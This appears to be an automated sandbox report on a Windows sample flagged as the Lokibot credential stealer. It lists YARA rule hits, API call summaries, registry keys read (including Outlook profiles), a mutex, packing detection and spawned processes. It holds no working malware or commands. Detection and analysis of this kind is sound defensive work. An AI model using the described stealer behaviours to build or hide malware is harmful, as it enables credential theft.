              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 2.2.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.2.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 2.2.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.2.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 2.0.U001P56ybm.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 2.0.U001P56ybm.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 2.0.U001P56ybm.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 2.0.U001P56ybm.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 2.1.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.1.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.U001P56ybm.exe.2430000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.U001P56ybm.exe.2430000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: U001P56ybm.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.2.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.2.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.2.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.2.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.1.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.1.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.U001P56ybm.exe.2430000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.U001P56ybm.exe.2430000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.U001P56ybm.exe.2430000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_00406043
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_00404618
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_0040681A
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_10014844
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_1000C47B
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_10013D60
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_1000C96F
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_1000CD87
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_1000D1BC
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_1000F1CD
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_100169CC
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_1000D5F1
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_10015AB1
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_100142D2
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_2_0040549C
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_2_004029D4
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_1_0040549C
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_1_004029D4
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: String function: 00404B22 appears 54 times
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: String function: 00412093 appears 40 times
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: String function: 0041219C appears 90 times
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: String function: 00405B6F appears 84 times
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: String function: 00404BEE appears 56 times
              Source: U001P56ybm.exe, 00000000.00000003.285538431.0000000002AA6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs U001P56ybm.exe
              Source: U001P56ybm.exe, 00000000.00000003.284071269.0000000002C3F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs U001P56ybm.exe
              Source: U001P56ybm.exeReversingLabs: Detection: 25%
              Source: C:\Users\user\Desktop\U001P56ybm.exeFile read: C:\Users\user\Desktop\U001P56ybm.exeJump to behavior
              Source: U001P56ybm.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\U001P56ybm.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Users\user\Desktop\U001P56ybm.exe "C:\Users\user\Desktop\U001P56ybm.exe"
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess created: C:\Users\user\Desktop\U001P56ybm.exe "C:\Users\user\Desktop\U001P56ybm.exe"
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess created: C:\Users\user\Desktop\U001P56ybm.exe "C:\Users\user\Desktop\U001P56ybm.exe"
              Source: C:\Users\user\Desktop\U001P56ybm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_1_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
              Source: C:\Users\user\Desktop\U001P56ybm.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeFile created: C:\Users\user\AppData\Local\Temp\nsi3BDC.tmpJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@0/1
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,
              Source: C:\Users\user\Desktop\U001P56ybm.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
              Source: C:\Users\user\Desktop\U001P56ybm.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
              Source: C:\Users\user\Desktop\U001P56ybm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
              Source: Binary string: wntdll.pdbUGP source: U001P56ybm.exe, 00000000.00000003.282481147.0000000002990000.00000004.00000001.sdmp, U001P56ybm.exe, 00000000.00000003.289797489.0000000002B20000.00000004.00000001.sdmp
              Source: Binary string: wntdll.pdb source: U001P56ybm.exe, 00000000.00000003.282481147.0000000002990000.00000004.00000001.sdmp, U001P56ybm.exe, 00000000.00000003.289797489.0000000002B20000.00000004.00000001.sdmp

              Data Obfuscation:

              barindex
              Yara detected aPLib compressed binaryShow sources
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.1.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.U001P56ybm.exe.2430000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: U001P56ybm.exe PID: 4640, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: U001P56ybm.exe PID: 5684, type: MEMORYSTR
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_10011705 push ecx; ret
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_2_00402AC0 push eax; ret
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_2_00402AC0 push eax; ret
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_1_00402AC0 push eax; ret
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_1_00402AC0 push eax; ret
